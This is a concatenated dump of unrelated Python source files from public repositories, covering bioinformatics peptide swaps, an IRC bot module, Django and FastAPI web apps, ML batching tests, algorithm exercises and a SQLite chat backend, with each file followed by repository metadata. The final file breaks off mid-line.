import os import glob from shutil import move, rmtree from nepitope import net_MHC_interface import importlib importlib.reload(net_MHC_interface) class Swaps(object): list_AA = ['A', 'R', 'N', 'D', 'C', 'Q', 'E', 'G', 'H', 'I', 'L', 'K', 'M', 'F', 'P', 'S', 'T', 'W', 'Y', 'V'] def __init__(self, high_affinity_df, fasta_file_dir, net_mhc_path, proteins=None): self.df = high_affinity_df self.protein_ids = self._get_prot_ids(proteins) #self.protein_input_df = self.df[self.df.ID.isin(self.protein_ids)] self.fasta_dir = fasta_file_dir self.mhc_path = net_mhc_path def find_swaps_write_to_fasta(self): nmers = self._get_nmers(self.df) alleles = self._get_alleles(self.df) mhc_commands = [] for prot_id in self.protein_ids: try: os.mkdir(self.fasta_dir + '%s/' % prot_id) except: pass for nmer in nmers: for allele in alleles: sliced = self._slice_df(nmer, allele, prot_id) if self.check_size(sliced): list_of_lists = sliced[['n-mer', 'Allele', 'ID', 'Pos', 'Peptide']].values.tolist() for item in list_of_lists: swaps = self._create_swaps(item[-1]) fasta_file = self._open_write_fasta(item, swaps, prot_id) self._create_mhc_command(item, fasta_file) self.reorg_files(prot_id) return mhc_commands def reorg_files(self, prot_id): prot_dir = self.fasta_dir + '%s' % prot_id dirs = glob.glob(prot_dir + '/mhc_preds*') final_dest = prot_dir + '/preds_per_swap' try: os.mkdir(final_dest) except: pass for i in dirs: file_source = glob.glob(i + '/*.xls') move(file_source[0], final_dest) print('Swap predictions regrouped to %s' % final_dest) for i in dirs: rmtree(i) def _create_mhc_command(self, item, fasta_location): nmer = [item[0]] allele = [item[1]] net_mhc = net_MHC_interface.netMHCComand(self.mhc_path, fasta_location, nmers=nmer, alleles=allele) net_mhc.create_text_command(write_to_txt=True) net_mhc.run_netMHC() def _open_write_fasta(self, data, swaps, prot_id): file_name = "_".join([self.fasta_dir + '%s/' % prot_id, 'swap', data[-1], 'Pos', str(data[-2]), 'ID', str(data[-3]).replace('_', '-'), 'Allele', str(data[-4]), 'nmer', str(data[-5])]) with open(file_name + '.fasta', 'w') as inf: for swap in swaps: inf.write("".join(['>', prot_id, '_', swap, '\n'])) inf.write(swap + '\n') return file_name + '.fasta' def _create_swaps(self, peptide): list_peps = [] for i in range(len(peptide)): for k in range(len(self.list_AA)): list_peps.append(self._insert_aa(peptide, i, self.list_AA[k])) return list_peps def _slice_df(self, nmer, allele, prot_id): return self.df.loc[(self.df['n-mer'] == nmer) & (self.df['Allele'] == allele) & (self.df['ID'] == prot_id)] @staticmethod def _insert_aa(string, index, aa): hash_string = list(string) del hash_string[index] hash_string.insert(index, aa) return "".join(hash_string) def _get_prot_ids(self, proteins): if proteins == 'All': return list(self.df['ID'].unique()) if isinstance(proteins, list): return self.check_existence(proteins) def check_existence(self, proteins): for protein in proteins: if protein not in self.df.ID.unique(): raise ValueError('Input protein %s not found in csv files' % protein) return proteins @staticmethod def _get_nmers(pepdata): return pepdata['n-mer'].unique() @staticmethod def _get_alleles(pepdata): return pepdata['Allele'].unique() @staticmethod def check_size(sliced): if len(sliced) == 0: return False else: return True
4,250
modules/autodeop/autodeop.py
clinchergt/pyCoBot
0
2171223
# -*- coding: utf-8 -*- from pycobot.pycobot import BaseModel from peewee.peewee import CharField from irc import client class autodeop: def __init__(self, core, client): core.addCommandHandler("autodeop", self, cpriv=6, cprivchan=True, chelp= "Activa o desactiva el autodeop en un canal. Sintaxis: autodeop <canal>" " <on/off>") try: autodeopt.create_table(True) except: pass core.addHandler("mode", self, "modeprot") def autodeop_p(self, bot, cli, event): if len(event.splitd) > 0: return event.splitd[0] return 1 def autodeop(self, bot, cli, ev): if len(ev.splitd) < 1: cli.msg(ev.target, "\00304Error\003: Faltan parametros.") return 1 ch = autodeopt.select().where(autodeopt.channel == ev.splitd[0]) if ev.splitd[1] == "on": if ch.count() == 0: autodeopt.create(channel=ev.splitd[0]) cli.msg(ev.target, "Se ha activado el autodeop en \2" + ev.splitd[0]) else: cli.msg(ev.target, "\00304Error\003: El autodeop ya esta a" "ctivado en el canal \2" + ev.splitd[0]) else: if ch.count() != 0: r = autodeopt.get(autodeopt.channel == ev.splitd[0]) r.delete_instance() cli.msg(ev.target, "Se ha desactivado el autodeop en \2" + ev.splitd[0]) else: cli.msg(ev.target, "\00304Error\003: El autodeop no esta a" "ctivado en el canal \2" + ev.splitd[0]) def modeprot(self, cli, ev): c = autodeopt.get(autodeopt.channel == ev.target) if c is False: return 1 if client.parse_nick(ev.source)[1] == cli.nickname: return 1 x = self.parsemode(cli, ev) for w in x: if w == cli.nickname: continue cli.mode(ev.target, "-o " + w) def parsemode(self, cli, ev): res = [] cmodelist = cli.features.chanmodes param = cmodelist[0] + cmodelist[1] + cmodelist[2] for i, val in enumerate(cli.features.prefix): param = param + cli.features.prefix[val] pos = 0 for c in ev.arguments[0]: if c == "-": rving = False pass elif c == "+": rving = True else: if c in param: pos = pos + 1 if rving is False: continue if c == "o": res.append(ev.arguments[pos]) # BEEP BEEP BEEP BEEP return res class autodeopt(BaseModel): channel = CharField(primary_key=True) class Meta: db_table = "autodeop"
2,836
esphomeyaml/components/sensor/bmp085.py
johnerikhalse/esphomeyaml
1
2172451
import voluptuous as vol import esphomeyaml.config_validation as cv from esphomeyaml.components import sensor from esphomeyaml.const import CONF_ADDRESS, CONF_MAKE_ID, CONF_NAME, CONF_PRESSURE, \ CONF_TEMPERATURE, CONF_UPDATE_INTERVAL from esphomeyaml.helpers import App, Application, HexIntLiteral, add, variable DEPENDENCIES = ['i2c'] MakeBMP085Sensor = Application.MakeBMP085Sensor PLATFORM_SCHEMA = sensor.PLATFORM_SCHEMA.extend({ cv.GenerateID(CONF_MAKE_ID): cv.declare_variable_id(MakeBMP085Sensor), vol.Required(CONF_TEMPERATURE): cv.nameable(sensor.SENSOR_SCHEMA), vol.Required(CONF_PRESSURE): cv.nameable(sensor.SENSOR_SCHEMA), vol.Optional(CONF_ADDRESS): cv.i2c_address, vol.Optional(CONF_UPDATE_INTERVAL): cv.update_interval, }) def to_code(config): rhs = App.make_bmp085_sensor(config[CONF_TEMPERATURE][CONF_NAME], config[CONF_PRESSURE][CONF_NAME], config.get(CONF_UPDATE_INTERVAL)) bmp = variable(config[CONF_MAKE_ID], rhs) if CONF_ADDRESS in config: add(bmp.Pbmp.set_address(HexIntLiteral(config[CONF_ADDRESS]))) sensor.setup_sensor(bmp.Pbmp.Pget_temperature_sensor(), bmp.Pmqtt_temperature, config[CONF_TEMPERATURE]) sensor.setup_sensor(bmp.Pbmp.Pget_pressure_sensor(), bmp.Pmqtt_pressure, config[CONF_PRESSURE]) BUILD_FLAGS = '-DUSE_BMP085_SENSOR'
1,439
Python3/0909-Snakes-and-Ladders/soln-1.py
wyaadarsh/LeetCode-Solutions
5
2172469
class Solution: def snakesAndLadders(self, board: List[List[int]]) -> int: # this is a bfs def num_to_rc(num): N = len(board) num -= 1 r, c = divmod(num, N) if r % 2: c = N - 1 - c r = N - 1 - r return r, c frontier = collections.deque([1]) seen = {1} target = len(board) * len(board) step = 0 while frontier: sz = len(frontier) for _ in range(sz): x = frontier.popleft() if x == target: return step for dx in range(1, 7): nx = x + dx if nx <= target: r, c = num_to_rc(nx) if board[r][c] != -1: nx = board[r][c] if nx not in seen: seen.add(nx) frontier.append(nx) step += 1 return -1
1,040
orchestrate_ai/mirex_lyrics_dataset/trainer.py
amrittb/orchestrate-a
18
2172327
import computation_graph """ Trains Lyrics Dataset Runs training in computation graph """ def train_lyrics(): computation_graph.train_lyrics()
145
vendas/core/views.py
JacksonOsvaldo/bc_calcado-vendas
0
2172250
from django.shortcuts import render, resolve_url from django.http import HttpResponseRedirect from django.core.urlresolvers import reverse_lazy from django.db.models import F, Count from django.views.generic import TemplateView, ListView, DetailView from django.views.generic.edit import UpdateView from django.forms.models import inlineformset_factory from .models import Customer, Seller, Brand, Product, Sale, SaleDetail from .forms import SaleForm, SaleDetailForm from .mixins import CounterMixin, FirstnameSearchMixin home = TemplateView.as_view(template_name='index.html') about = TemplateView.as_view(template_name='about.html') class CustomerList(CounterMixin, FirstnameSearchMixin, ListView): template_name = 'core/person/customer_list.html' model = Customer paginate_by = 8 class CustomerDetail(DetailView): template_name = 'core/person/customer_detail.html' model = Customer class CustomerUpdate(UpdateView): template_name = 'core/person/customer_edit.html' model = Customer success_url = reverse_lazy('customer_detail') class SellerList(CounterMixin, FirstnameSearchMixin, ListView): template_name = 'core/person/seller_list.html' model = Seller paginate_by = 8 class SellerDetail(DetailView): template_name = 'core/person/seller_detail.html' model = Seller class BrandList(CounterMixin, ListView): template_name = 'core/product/brand_list.html' model = Brand class ProductList(CounterMixin, ListView): template_name = 'core/product/product_list.html' model = Product paginate_by = 100 def get_queryset(self): p = Product.objects.all() q = self.request.GET.get('search_box') # buscar por produto if q is not None: p = p.filter(product__icontains=q) # filtra produtos em baixo estoque if self.request.GET.get('filter_link', False): p = p.filter(stock__lt=F('stock_min')) # filtra produtos fora de linha if self.request.GET.get('outofline', False): p = p.filter(outofline=1) return p def sale_create(request): order_forms = Sale() item_order_formset = inlineformset_factory( Sale, SaleDetail, form=SaleDetailForm, extra=0, can_delete=False, min_num=1, validate_min=True) if request.method == 'POST': forms = SaleForm(request.POST, request.FILES, instance=order_forms, prefix='main') formset = item_order_formset( request.POST, request.FILES, instance=order_forms, prefix='product') if forms.is_valid() and formset.is_valid(): forms = forms.save() formset.save() return HttpResponseRedirect(resolve_url('core:sale_detail', forms.pk)) else: forms = SaleForm(instance=order_forms, prefix='main') formset = item_order_formset(instance=order_forms, prefix='product') context = { 'forms': forms, 'formset': formset, } return render(request, 'core/sale/sale_form.html', context) class SaleList(CounterMixin, ListView): template_name = 'core/sale/sale_list.html' model = Sale paginate_by = 20 def get_queryset(self): # filtra vendas com um item if 'filter_sale_one' in self.request.GET: return Sale.objects.annotate( itens=Count('sales_det')).filter(itens=1) # filtra vendas com zero item if 'filter_sale_zero' in self.request.GET: return Sale.objects.annotate( itens=Count('sales_det')).filter(itens=0) # filtros no queryset qs = super(SaleList, self).get_queryset() # clica no cliente e retorna as vendas dele if 'customer' in self.request.GET: qs = qs.filter(customer=self.request.GET['customer']) # clica no vendedor e retorna as vendas dele if 'seller' in self.request.GET: qs = qs.filter(seller=self.request.GET['seller']) return qs class SaleDetailView(DetailView): template_name = 'core/sale/sale_detail.html' model = Sale context_object_name = 'Sale' def get_context_data(self, **kwargs): sd = SaleDetail.objects.filter(sale=self.object) context = super(SaleDetailView, self).get_context_data(**kwargs) context['count'] = sd.count() context['Itens'] = sd return context
4,409
tests/batching/test_adaptive.py
alexander-manley/MLServer
191
2172398
import asyncio import pytest from typing import List from mlserver.batching.adaptive import AdaptiveBatcher from mlserver.batching.shape import Shape from mlserver.types import InferenceRequest, RequestInput from mlserver.model import MLModel from mlserver.utils import generate_uuid from .conftest import TestRequestSender async def test_batch_requests( adaptive_batcher: AdaptiveBatcher, send_request: TestRequestSender, ): max_batch_size = adaptive_batcher._max_batch_size sent_requests = dict( await asyncio.gather(*[send_request() for _ in range(max_batch_size)]) ) batched_requests = [ batched_req async for batched_req in adaptive_batcher._batch_requests() ] assert len(batched_requests) == 1 assert batched_requests[0].inference_requests == sent_requests async def test_batch_requests_timeout( adaptive_batcher: AdaptiveBatcher, send_request: TestRequestSender, ): """ Test that a batch size smaller than the max batch size, the timeout is hit and the request gets processed. """ for _ in range(2): sent_request = dict([await send_request()]) batched_requests = [ batched_req async for batched_req in adaptive_batcher._batch_requests() ] assert len(batched_requests) == 1 assert batched_requests[0].inference_requests == sent_request async def test_batcher( adaptive_batcher: AdaptiveBatcher, send_request: TestRequestSender, sum_model: MLModel, ): max_batch_size = adaptive_batcher._max_batch_size sent_requests = dict( await asyncio.gather(*[send_request() for _ in range(max_batch_size)]) ) await adaptive_batcher._batcher() assert sent_requests.keys() == adaptive_batcher._async_responses.keys() for internal_id, sent_request in sent_requests.items(): async_response = adaptive_batcher._async_responses[internal_id] response = await async_response assert sent_request.id == response.id expected = await sum_model.predict(sent_request) assert expected == response async def test_batcher_propagates_errors( adaptive_batcher: AdaptiveBatcher, send_request: TestRequestSender, mocker, ): message = "This is an error" async def _async_exception(): raise Exception(message) max_batch_size = adaptive_batcher._max_batch_size sent_requests = dict( await asyncio.gather(*[send_request() for _ in range(max_batch_size)]) ) adaptive_batcher._predict_fn = mocker.stub("_predict_fn") adaptive_batcher._predict_fn.return_value = _async_exception() await adaptive_batcher._batcher() for internal_id, _ in sent_requests.items(): with pytest.raises(Exception) as err: await adaptive_batcher._async_responses[internal_id] assert str(err.value) == message async def test_batcher_cancels_responses( adaptive_batcher: AdaptiveBatcher, mocker, ): message = "This is an error" async def _async_exception(): raise Exception(message) num_requests = adaptive_batcher._max_batch_size * 2 + 2 adaptive_batcher._batcher = mocker.stub("_batcher") adaptive_batcher._batcher.side_effect = iter(_async_exception, None) requests = [ InferenceRequest( id=generate_uuid(), inputs=[ RequestInput( name="input-0", shape=[1, 3], datatype="INT32", data=[idx, idx + 1, idx + 2], ) ], ) for idx in range(num_requests) ] responses = await asyncio.gather( *[adaptive_batcher.predict(request) for request in requests], return_exceptions=True, ) for response in responses: assert isinstance(response, Exception) assert str(response) == message @pytest.mark.parametrize( "requests", [ [ InferenceRequest( id=f"request-{idx}", inputs=[ RequestInput( name="input-0", shape=[1, 3], datatype="INT32", data=[idx, idx + 1, idx + 2], ) ], ) # 10 is the max_batch_size for sum_model # Make sure one batch is only half-full for idx in range(10 * 2 + 2) ], [ InferenceRequest( id="large-request", inputs=[ # 10 is the max batch size, so we send a minibatch with # 20 entries RequestInput( name="input-0", shape=[10 * 2, 3], datatype="INT32", data=[n for n in range(10 * 2 * 3)], ) ], ), InferenceRequest( id="regular-request", inputs=[ RequestInput( name="input-0", shape=[1, 3], datatype="INT32", data=[1000, 1001, 1002], ) ], ), ], ], ) async def test_predict( requests: List[InferenceRequest], adaptive_batcher: AdaptiveBatcher, sum_model: MLModel, ): responses = await asyncio.gather( *[adaptive_batcher.predict(request) for request in requests] ) assert len(requests) == len(responses) for req, res in zip(requests, responses): assert req.id == res.id req_shape = Shape(req.inputs[0].shape) res_shape = Shape(res.outputs[0].shape) assert req_shape.batch_size == res_shape.batch_size expected = await sum_model.predict(req) assert res == expected
5,939
vue_uikit/vues/tools/errorCode.py
Xpf123131123/django-web
0
2171024
""" errorCode """ # userDoesNotExits = 1001 # 用户不存在 userHasBeenExits = 1002 # 用户已存在 userOrPasswordError = 1003 # 用户名或密码错误 serverBusy = 1004 # 服务器繁忙
154
app.py
llxp/AgeOfRandomBackend
0
2171479
import os from flask import Flask, send_from_directory from flask_cors import CORS from aor_parser import \ AORTechParser, AORCardParser, \ AORStringsParser, HomecityParser app = Flask(__name__, static_url_path='') cors = CORS(app) current_path = os.getcwd() tech_parser = AORTechParser( current_path + '\\data\\Data\\techtreey.xml') strings_parser = AORStringsParser( current_path + '\\data\\Data\\strings') homecity_parser = HomecityParser(current_path + '\\data\\Data', current_path + '\\data\\Data\\civs.xml') parser = AORCardParser( current_path + '\\data\\Data', tech_parser, strings_parser, homecity_parser ) @app.route( '/api/get_cards', methods=['GET']) def index(): return parser.cards @app.route('/img/<path:path>') def send_js(path): return send_from_directory('data/pictures/Data/wpfg', path) if __name__ == '__main__': app.debug = True app.run(host='0.0.0.0', port=5005)
950
src/deprecated/test_rl.py
floraxue/active-rl
0
2171177
import torch import torch.optim as optim from itertools import count import argparse from os.path import join from agent import NSQ from policy import PolicyNet from game import VFGGAME from explorer import Explorer from util import logger from train_new import MACHINE_LABEL_DIR_HOLDOUT, CLASSIFIER_ROOT_HOLDOUT from train_new import test_all from deprecated.lsun import test_lsun_model_holdout, train_lsun_model_holdout def parse_arguments(): parser = argparse.ArgumentParser(description="training N-step Q learning") parser.add_argument('--category', type=str, default='cat', help='image category') parser.add_argument('--budget', type=int, default=10000, help='maximum number of examples for human annotation') parser.add_argument('--eps-start', type=float, default=0.9, help='starting epsilon') parser.add_argument('--eps-end', type=float, default=0.05, help='ending epsilon') parser.add_argument('--decay-steps', type=int, default=100000, help='decay steps') parser.add_argument('--gamma', type=float, default=0.999, help='discount factor') parser.add_argument('--duration', '-N', type=int, default=100, help='get reward every N steps') parser.add_argument('--batch-size', type=int, default=128, help='batch size') parser.add_argument('--target-update', '-T', type=int, default=1000, help='update target network every T steps') parser.add_argument('--learning-start', type=int, default=50000) parser.add_argument('--buffer-size', type=int, default=100000) parser.add_argument('--num-actions', type=int, default=2, help='default action is `keep` or `drop`') parser.add_argument('--input_dim', type=int, default=2048, help='feature size') parser.add_argument('--save-every', type=int, default=1, help='save the checkpoint every K episode') parser.add_argument('--val_rate', type=float, default=0.2) parser.add_argument('--test_rate', type=float, default=0.2) # flags for the game parser.add_argument('--eval-dir', type=str, default='', help='path to the training list folder') parser.add_argument('--train-prefix', type=str, default='train', help='prefix of the training files') parser.add_argument('--key-path', type=str, help='key path for the unknown data set') parser.add_argument('--work-dir', type=str, default='', help = 'work dir') parser.add_argument('--pretrained', type=str, default='', help='path to pretrained NSQ policy') args = parser.parse_args() global work_dir work_dir = args.work_dirs return args def test_nsq(args, game, q_func): device = 'cuda' if torch.cuda.is_available() else 'cpu' input_dim = args.input_dim num_actions = args.num_actions Q = q_func(input_dim, num_actions).to(device) target_Q = q_func(input_dim, num_actions).to(device) optimizer = optim.RMSprop(Q.parameters()) expr = Explorer(args.eps_start, args.eps_end, decay_steps=args.decay_steps) robot = NSQ(Q, target_Q, optimizer, expr, gamma=args.gamma, num_actions=num_actions) episode_durations = [] # Pipeline params category = args.category # Set initial unsure key path new_key_path = join(MACHINE_LABEL_DIR_HOLDOUT, '{}_trial_{}_unsure.p'.format(category, 0)) # Test on RL agent logger.info('Testing on RL agent') for i_episode in range(1, args.episodes + 1): game.reset(new_key_path) # pipeline param trial = i_episode robot.q_function.reset_hidden(args.batch_size) robot.target_q_function.reset_hidden(args.batch_size) # sample the initial feature from the environment # since our policy network takes the hidden state and the current # feature as input. The hidden state is passed implicitly state = game.sample() for t in count(): action, qvalue = robot.act(state) reward, next_state, done = game.step(action) if action > 0 and (game.chosen % game.duration == 0 or game.chosen == game.budget): # Train the classifier game.train_model('latest_RL', CLASSIFIER_ROOT_HOLDOUT) # select threshold game.test_model('latest_RL', CLASSIFIER_ROOT_HOLDOUT) state = next_state if done: episode_durations.append(t + 1) # propagate through the whole dataset and split test_all_data_holdout(category, i_episode, "RL") new_key_path = join(MACHINE_LABEL_DIR_HOLDOUT, 'RL', '{}_trial_{}_unsure.p'.format(category, trial)) break # Test on LSUN logger.info("Testing on LSUN") for i_episode in range(1, args.episodes + 1): trial = i_episode new_key_path = join(MACHINE_LABEL_DIR_HOLDOUT, 'latest_LSUN', '{}_trial_{}_unsure.p'.format('cat', trial - 1)) train_lsun_model_holdout(game, "latest_LSUN", CLASSIFIER_ROOT_HOLDOUT, new_key_path) test_lsun_model_holdout("latest_LSUN", CLASSIFIER_ROOT_HOLDOUT) test_all_data_holdout(category, i_episode, "LSUN") def test_all_data_holdout(category, i_episode, mode): """ test to split the dataset :return: """ trial = i_episode model_file_dir = join(CLASSIFIER_ROOT_HOLDOUT, 'latest_{}'.format(mode), 'snapshots') last_trial_key_path = join(MACHINE_LABEL_DIR_HOLDOUT, mode, '{}_trial_{}_unsure.p'.format(category, trial - 1)) test_all(last_trial_key_path, trial, 'resnet', 'cat', model_file_dir) def main(): args = parse_arguments() game = VFGGAME(args) q_func = PolicyNet test_nsq(args, game, q_func) if __name__ == '__main__': main()
6,108
Task03/FindWordOccurence.py
apilatau/pythonSandBox
0
2171642
import re text = [ "Hello, World!", "The world is mine", "Hello, how are you?" ] def get_words(text): words = [] for sentence in text: words_in_sentence = re.findall(r'\w+', sentence.lower()) for item in words_in_sentence: words.append(item) return words def get_words_dict(words): words_dict = dict() for word in words: if word in words_dict: words_dict[word] = words_dict[word] + 1 else: words_dict[word] = 1 return words_dict def get_index_text(word): for sentence in text: sentence_words = re.split(r'\W+', sentence.lower()) if word in sentence_words: return text.index(sentence) def main(): words = get_words(text) words_dict = get_words_dict(words) print(f"{'word':10}{'count':<10}{'occurrence':>10}") for word in words_dict: index_occerence = get_index_text(word) print(f"{word:<10}{words_dict[word]:<10}{index_occerence:<10}") main()
1,075
src/iam_sarif_report/bootstrap.py
georgealton/iam-policy-validator-to-sarif
3
2170167
from __future__ import annotations import punq from .adapters import checks, reader, reporter, validator from .domain import converter from .service_layer import bus, handlers def bootstrap() -> bus.Bus: container = punq.Container() container.register("Reader", reader.LocalFileReader) container.register("ChecksRepository", checks.ChecksPackageDataRepository) container.register("Reporter", reporter.CLIReporter) container.register("Converter", converter.SarifConverter) container.register("Validator", validator.AWSAccessAnalyzerValidator) return bus.Bus( command_handlers={ Command: container.instantiate(Handler) for Command, Handler in handlers.Handler.registry.items() } )
757
09/xmas.py
josiah-keller/aoc-2020
0
2170779
#!/usr/bin/env python3 """ Crack the XMAS encoding. https://adventofcode.com/2020/day/9 """ import argparse def fetch_preamble(file, n): """ Given a file, read the first n numbers. Sort the list for faster search. Return both the original list and the sorted list as a tuple. """ numbers = [] while len(numbers) < n: numbers.append(fetch_next(file)) return (numbers, sorted(numbers)) def fetch_next(file): return int(file.readline()) def update(ls, new_number): """ Given a tuple of original list and sorted list, add the new number to the lists and drop the oldest number. Return the updated tuple. (they are also updated by reference). """ (numbers, sorted_numbers) = ls drop = numbers[0] numbers = numbers[1:] + [new_number] sorted_numbers.remove(drop) # ok for there to be duplicates b/c we just remove the first one! sorted_numbers.append(new_number) sorted_numbers.sort() # would be more efficient to iterate once and insert/remove but who cares return (numbers, sorted_numbers) def is_valid(ls, number): """ Given a tuple of original list and sorted list, determine whether the next number is valid (ie, is a sum of some pair in the list) """ (numbers, sorted_numbers) = ls for i in range(len(sorted_numbers) - 1, 0, -1): if sorted_numbers[i] > number: continue for j in range(0, i): if sorted_numbers[i] + sorted_numbers[j] == number: return True return False def find_range(file, target): """ Given a file, read numbers to find a contiguous list of numbers that sums to the given target number. Return the list. """ numbers = [] candidate = sum(numbers) while candidate != target: if candidate > target: numbers.pop(0) else: numbers.append(fetch_next(file)) candidate = sum(numbers) return numbers if __name__ == '__main__': parser = argparse.ArgumentParser(description=__doc__) parser.add_argument('filename', help='Path to the file containing XMAS data') parser.add_argument('--tail-len', type=int, default=25, help='Length of preamble/previous N numbers to consider') args = parser.parse_args() with open(args.filename, 'r') as f: tail = fetch_preamble(f, args.tail_len) number = fetch_next(f) while(is_valid(tail, number)): tail = update(tail, number) number = fetch_next(f) target_number = number print('Invalid number (target):', target_number) f.seek(0) contig = find_range(f, target_number) print('Found range that sums to target number:', contig) xmas = min(contig) + max(contig) print('XMAS value:', xmas)
2,624
algorithm/about_merge_sort.py
dictxwang/python-fragments
0
2171028
# -*- coding: utf8 -*- __author__ = 'wangqiang' ''' 归并排序:最坏时间复杂度 n*lgn 采用分而治之的方式 ''' def merge_sort(lst): if len(lst) <= 1: return lst middle = len(lst) // 2 # 分别递归排序左右两个子序列 left = merge_sort(lst[:middle]) right = merge_sort(lst[middle:]) # 对已排序的子序列进行合并 i = 0 j = 0 k = 0 result = [0] * len(lst) while i < len(left) and j < len(right): if left[i] <= right[j]: result[k] = left[i] i += 1 else: result[k] = right[j] j += 1 k += 1 # 将子序列多出的元素直接追加到结果序列中 while i < len(left): result[k] = left[i] k += 1 i += 1 while j < len(right): result[k] = right[j] k += 1 j += 1 return result if __name__ == '__main__': lst = [23, 1, 4, 5, -10, 56, 190, 230, 20, 30, 40, 50] lst = merge_sort(lst) print(lst)
898
sector/migrations/0004_auto_20180305_1429.py
uktrade/invest
1
2172550
# -*- coding: utf-8 -*- # Generated by Django 1.11.10 on 2018-03-05 14:29 from __future__ import unicode_literals from django.db import migrations import wagtail.core.blocks import wagtail.core.fields import wagtailmarkdown.blocks class Migration(migrations.Migration): dependencies = [ ('sector', '0003_sectorpage_show_on_frontpage'), ] operations = [ migrations.AlterField( model_name='sectorpage', name='pullout', field=wagtail.core.fields.StreamField((('content', wagtail.core.blocks.StructBlock((('text', wagtailmarkdown.blocks.MarkdownBlock()), ('stat', wagtail.core.blocks.CharBlock()), ('stat_text', wagtail.core.blocks.CharBlock())), max_num=1, min_num=0)),), blank=True), ), ]
768
ui/maintenance_protocols/configure_make_install.py
liyao001/BioQueue
33
2170491
#!/usr/bin/env python # -*- coding: utf-8 -*- # @Time : 29/12/2017 10:05 AM # @Project : main # @Author : <NAME> # @File : configure_make_install.py def get_sub_protocol(db_obj, protocol_parent, step_order_start=1): steps = list() steps.append(db_obj(software='./configure', parameter='--prefix {{UserBin}}', parent=protocol_parent, user_id=0, hash='dfca5277f71c6782e3351f6ed9ac7fcb', step_order=step_order_start)) steps.append(db_obj(software='make', parameter='', parent=protocol_parent, user_id=0, hash='099dafc678df7d266c25f95ccf6cde22', step_order=step_order_start+1)) steps.append(db_obj(software='make', parameter='install', parent=protocol_parent, user_id=0, hash='12b64827119f4815ca8d43608d228f36', step_order=step_order_start+2)) return step_order_start+len(steps), steps
1,170
src/api_segura/app/app.py
PythonistaMX/py261
0
2170175
from typing import List from fastapi import FastAPI, Depends from fastapi.exceptions import HTTPException from sqlalchemy.orm import Session from app import crud from app import models from app import schemas from app.db import create_db_and_tables, get_db from app.users import auth_backend, current_active_user, fastapi_users app = FastAPI() @app.get("/api/", response_model=List[schemas.SchemaAlumno]) def vuelca_base(skip: int = 0, limit: int = 100, db: Session = Depends(get_db)): alumnos = crud.consulta_alumnos(db, skip=skip, limit=limit) return alumnos @app.get("/api/{cuenta}", response_model=schemas.SchemaAlumno) def get_alumno(cuenta, db: Session = Depends(get_db)): alumno = crud.consulta_alumno(db=db, cuenta=cuenta) if alumno: return alumno else: raise HTTPException(status_code=404, detail="Recurso no encontrado") @app.delete("/api/{cuenta}") async def delete_alumno(cuenta, user: models.UserDB = Depends(current_active_user), db: Session = Depends(get_db)): alumno = crud.consulta_alumno(db=db, cuenta=cuenta) if alumno: crud.baja_alumno(db=db, alumno=alumno) return {} else: raise HTTPException(status_code=404, detail="Recurso no encontrado") @app.post("/api/{cuenta}", response_model=schemas.SchemaAlumno) def post_alumno(cuenta, candidato: schemas.SchemaAlumnoIn, db: Session = Depends(get_db)): alumno = crud.consulta_alumno(db=db, cuenta=cuenta) if alumno: raise HTTPException(status_code=409, detail="Recurso existente") return crud.alta_alumno(db=db, cuenta=cuenta, candidato=candidato) @app.put("/api/{cuenta}", response_model=schemas.SchemaAlumno) def put_alumno(cuenta, candidato: schemas.SchemaAlumnoIn, db: Session = Depends(get_db)): alumno = crud.consulta_alumno(db=db, cuenta=cuenta) if alumno: crud.baja_alumno(db=db, alumno=alumno) return crud.alta_alumno(db=db, cuenta=cuenta, candidato=candidato) else: raise HTTPException(status_code=404, detail="Recurso no encontrado") AUTH_PATH ='/auth' app.include_router(fastapi_users.get_auth_router(auth_backend), prefix=f"{AUTH_PATH}/jwt", tags=["auth"]) app.include_router(fastapi_users.get_register_router(), prefix=f"{AUTH_PATH}", tags=["auth"]) app.include_router(fastapi_users.get_reset_password_router(), prefix=f"{AUTH_PATH}", tags=["auth"],) app.include_router(fastapi_users.get_verify_router(), prefix=f"{AUTH_PATH}", tags=["auth"],) app.include_router(fastapi_users.get_users_router(), prefix="/users", tags=["users"]) @app.on_event("startup") async def on_startup(): # Not needed if you setup a migration system like Alembic await create_db_and_tables()
2,730
server-side/safeBase.py
tomellericcardo/SafeChat
1
2169181
# -*- coding: utf-8 -*- from os.path import realpath, dirname, join from re import compile from sqlite3 import connect class SafeBase: def __init__(self, g, database_filename): self.g = g posizione = dirname(realpath(__file__)) self.percorso = join(posizione, database_filename) self.init_db() def init_db(self): database = connect(self.percorso) cursore = database.cursor() cursore.execute(''' CREATE TABLE IF NOT EXISTS utente ( username TEXT PRIMARY KEY, password TEXT NOT NULL, chiave TEXT NOT NULL, sale TEXT NOT NULL ) ''') database.commit() cursore.execute(''' CREATE TABLE IF NOT EXISTS profilo ( username TEXT PRIMARY KEY, nome TEXT, cognome TEXT, stato TEXT, foto TEXT ) ''') database.commit() cursore.execute(''' CREATE TABLE IF NOT EXISTS messaggio ( chiave INTEGER PRIMARY KEY AUTOINCREMENT, proprietario TEXT NOT NULL, partecipante TEXT NOT NULL, mittente TEXT NOT NULL, immagine INT DEFAULT 0, testo TEXT NOT NULL, data_ora DATETIME DEFAULT CURRENT_TIMESTAMP, letto INT DEFAULT 0 ) ''') database.commit() cursore.execute(''' CREATE VIEW IF NOT EXISTS ultimo_messaggio AS SELECT m.proprietario, m.mittente, m.partecipante, m.testo, m.immagine, m.data_ora, m.letto FROM messaggio m INNER JOIN ( SELECT proprietario, partecipante, MAX(data_ora) AS data_ora FROM messaggio GROUP BY proprietario, partecipante ) u ON u.proprietario = m.proprietario AND u.partecipante = m.partecipante AND u.data_ora = m.data_ora ''') database.commit() cursore.execute(''' CREATE VIEW IF NOT EXISTS non_letti AS SELECT proprietario, partecipante, SUM(CASE letto WHEN 0 THEN 1 ELSE 0 END) AS non_letti FROM messaggio GROUP BY proprietario, partecipante ''') database.commit() cursore.close() database.close() def apri_connessione(self): self.g.db = connect(self.percorso) self.g.db.text_factory = str self.g.db.create_function('REGEXP', 2, self.regexp) def chiudi_connessione(self): db = getattr(self.g, 'db', None) if db is not None: db.close() def regexp(self, espressione, oggetto): reg = compile(espressione) return reg.search(oggetto) is not None def leggi_righe(self, query, parametri): cursore = self.g.db.cursor() cursore.execute(query, parametri) risultato = cursore.fetchall() cursore.close() return risultato def leggi_riga(self, query, parametri): cursore = self.g.db.cursor() cursore.execute(query, parametri) risultato = cursore.fetchone() cursore.close() return risultato def leggi_dato(self, query, parametri): return self.leggi_riga(query, parametri)[0] def scrivi(self, query, parametri): cursore = 